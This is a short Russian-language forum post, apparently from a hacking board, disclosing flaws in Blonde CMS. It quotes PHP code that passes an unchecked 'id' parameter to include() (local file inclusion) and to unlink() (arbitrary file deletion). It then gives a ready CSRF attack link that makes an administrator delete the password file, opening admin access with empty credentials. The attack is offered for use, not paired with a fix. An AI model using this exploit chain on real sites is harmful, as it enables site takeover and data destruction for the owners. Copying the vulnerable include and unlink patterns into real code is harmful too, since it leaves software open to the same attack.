S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
/*****************************************/ // Название: Blonde CMS // Версия: beta // Автор Гриня (Uhty) Россия !!! 2002 год // Подправлен к современным условиям Титов Андрей, Дмитрий Камаев // Дата выпуска: 25 июня 2009 года // Лицензия: Free // URL: BlondeCMS.ru // Услуги $: Доработка CMS под ваши нужды, создание скриптов, CMS на заказ /******************************************/ LFI Требуеться:MQ=OFF Сценарий index.php . . . . . . . . . .
if (isset($_GET ['id']))
{
$id = $_GET ['id'];
}
else
{
$id = $index;
}
if (file_exists ("engine/content/" . $id . ".php"))
{
include ("engine/content/" . $id . ".php");
}
else
{
include ('engine/404.html'); exit;
}
. . . . . . . . . .
Подключаються файлы с раширением "php",обрезать расширение можно одним из известных нам способов. Удаление произвольного файла с правами админа admin_delete.php if(!isset($_GET['id'])) die('Не задана страница для удаления');
if(unlink('../engine/content/'.$_GET['id'].'.php'))
{
echo 'Страница '.$_GET['id'].' удалена.<br>'; CSRF Просим админа перейти на сцыль admin/admin_delete.php?id=../../admin/passw получаем админку с пустым логином и паролем…
|